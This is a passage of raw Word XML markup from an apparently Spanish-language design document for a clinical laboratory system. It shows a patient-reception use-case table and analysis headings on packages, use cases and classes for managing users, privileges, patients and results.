            </w:r>
            <w:r w:rsidR="00BB4BD8">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Recepción</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> paciente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D8083F" w:rsidTr="00BB4BD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29" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00C05BAF" w:rsidRDefault="00D8083F" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Propósito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3771" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00C05BAF" w:rsidRDefault="00D8083F"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Atender al paciente cuando llega al laboratorio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D8083F" w:rsidTr="00BB4BD8">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1229" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00C05BAF" w:rsidRDefault="00D8083F" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3771" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00C05BAF" w:rsidRDefault="00D8083F" w:rsidP="0074429D">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Permite registrar al paciente si es que llega por primera vez, caso contrario se obtendrá su información a través de su CI. </w:t>
            </w:r>
            <w:r w:rsidR="00BB4BD8">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Además,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> nos permite recolectar los análisis que el paciente necesita. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D8083F" w:rsidTr="00BB4BD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29" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00C05BAF" w:rsidRDefault="00D8083F" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Actores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3771" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00C05BAF" w:rsidRDefault="00D8083F"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Recepcionista y Paciente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D8083F" w:rsidTr="00BB4BD8">
        <w:trPr>
          <w:trHeight w:val="100"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1229" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00C05BAF" w:rsidRDefault="00D8083F" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Actor Iniciador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3771" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00C05BAF" w:rsidRDefault="00D8083F" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Paciente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D8083F" w:rsidTr="00BB4BD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29" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00C05BAF" w:rsidRDefault="00D8083F" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Precondición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3771" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00C05BAF" w:rsidRDefault="00D8083F"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D8083F" w:rsidTr="00BB4BD8">
        <w:trPr>
          <w:trHeight w:val="260"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1229" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00C05BAF" w:rsidRDefault="00D8083F" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Proceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3771" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRDefault="00D8083F" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00825FB1">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00825FB1">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="00825FB1">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>le</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ccionar Análisis</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D8083F" w:rsidRPr="006566BC" w:rsidRDefault="00D8083F" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">2.  </w:t>
            </w:r>
            <w:r w:rsidRPr="006566BC">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Introducir CI</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D8083F" w:rsidRPr="007C4426" w:rsidRDefault="00D8083F" w:rsidP="0074429D">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b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007C4426">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Buscar </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D8083F" w:rsidRPr="006566BC" w:rsidRDefault="00D8083F" w:rsidP="0074429D">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szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007C4426">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Introducir datos del paciente</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D8083F" w:rsidRPr="006566BC" w:rsidRDefault="00D8083F" w:rsidP="0074429D">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szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Continuar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D8083F" w:rsidTr="00BB4BD8">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29" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00C05BAF" w:rsidRDefault="00D8083F" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Postcondición</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3771" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00C05BAF" w:rsidRDefault="00BB4BD8" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ninguna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D8083F" w:rsidTr="00BB4BD8">
        <w:trPr>
          <w:trHeight w:val="116"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1229" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="00C05BAF" w:rsidRDefault="00D8083F" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Excepciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3771" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00D8083F" w:rsidRPr="000C2AF7" w:rsidRDefault="00BB4BD8" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ninguna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D8083F" w:rsidRDefault="00D8083F" w:rsidP="00D8083F"/>
    <w:p w:rsidR="00D8083F" w:rsidRDefault="00D8083F" w:rsidP="00D8083F"/>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="00277259" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc454371317"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Análisis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc422314679"/>
      <w:bookmarkStart w:id="57" w:name="_Toc454371318"/>
      <w:r>
        <w:t>Análisis de arquitectura</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc454371319"/>
      <w:r>
        <w:t>Identificar paquetes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:r w:rsidRPr="00BD1124">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A4C10B8" wp14:editId="232A0A8F">
            <wp:extent cx="5581650" cy="2457450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1374650448" name="Imagen 137465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2457450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="001C49D7" w:rsidRDefault="001B08E6" w:rsidP="001B08E6"/>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc454371320"/>
      <w:r>
        <w:t>Encapsulamiento de casos de usos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00423CA3" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:r w:rsidRPr="00423CA3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EE3CDC4" wp14:editId="2459AC6D">
            <wp:extent cx="5629275" cy="3996835"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1374650480" name="Imagen 1374650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6398" cy="4001892"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:r w:rsidRPr="00423CA3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F388B5F" wp14:editId="574770B6">
            <wp:extent cx="5612130" cy="3505900"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1374650478" name="Imagen 1374650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505900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:r w:rsidRPr="00423CA3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ABBCE9B" wp14:editId="41F1FE01">
            <wp:extent cx="5612130" cy="3761145"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1374650479" name="Imagen 1374650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3761145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:r w:rsidRPr="00462D1E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BAA4334" wp14:editId="4DE10FBC">
            <wp:extent cx="5612130" cy="3636756"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1905"/>
            <wp:docPr id="1374650481" name="Imagen 137465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636756"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00F82A4B" w:rsidRDefault="001B08E6" w:rsidP="001B08E6"/>
    <w:p w:rsidR="001B08E6" w:rsidRPr="004154DB" w:rsidRDefault="001B08E6" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc422314680"/>
      <w:bookmarkStart w:id="61" w:name="_Toc454371321"/>
      <w:r>
        <w:t>Análisis Casos de U</w:t>
      </w:r>
      <w:r w:rsidRPr="004154DB">
        <w:t xml:space="preserve">so </w:t>
      </w:r>
      <w:r>
        <w:t>y Clases</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc454371322"/>
      <w:r>
        <w:t>Gestionar u</w:t>
      </w:r>
      <w:r w:rsidRPr="004154DB">
        <w:t>suario</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="004154DB" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E25843A" wp14:editId="104E7240">
            <wp:extent cx="5605780" cy="2528570"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="230" name="Imagen 230" descr="J:\Imagenes\Comunicacion CU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magenes\Comunicacion CU1.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5780" cy="2528570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00851A08" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00851A08">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-BO" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C81B82D" wp14:editId="07834F4C">
            <wp:extent cx="5638503" cy="4780280"/>
            <wp:effectExtent l="0" t="0" r="635" b="1270"/>
            <wp:docPr id="233" name="Imagen 233" descr="J:\Imagenes\Analisis de clases CU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Imagenes\Analisis de clases CU1.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5304" cy="4786046"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc454371323"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Gestionar privilegio</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00851A08">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-BO" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5385CBE2" wp14:editId="4EEB7C8F">
            <wp:extent cx="5612130" cy="2639277"/>
            <wp:effectExtent l="0" t="0" r="7620" b="8890"/>
            <wp:docPr id="236" name="Imagen 236" descr="J:\Imagenes\Comunicacion CU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Imagenes\Comunicacion CU3.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2639277"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00851A08">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-BO" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B166386" wp14:editId="64F4E2E5">
            <wp:extent cx="5612130" cy="2607230"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3175"/>
            <wp:docPr id="237" name="Imagen 237" descr="J:\Imagenes\Analisis de clases CU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Imagenes\Analisis de clases CU3.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2607230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00BB4BD8" w:rsidRDefault="009D0BAC" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc454371324"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Gestionar p</w:t>
      </w:r>
      <w:r w:rsidR="001B08E6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>aciente</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009331D6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-BO" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21B15584" wp14:editId="2B2A7921">
            <wp:extent cx="5612130" cy="2023768"/>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2023768"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009331D6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-BO" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1775A81B" wp14:editId="17BEC15E">
            <wp:extent cx="5612130" cy="2906437"/>
            <wp:effectExtent l="0" t="0" r="762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2906437"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc454371325"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Gestionar resultados</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
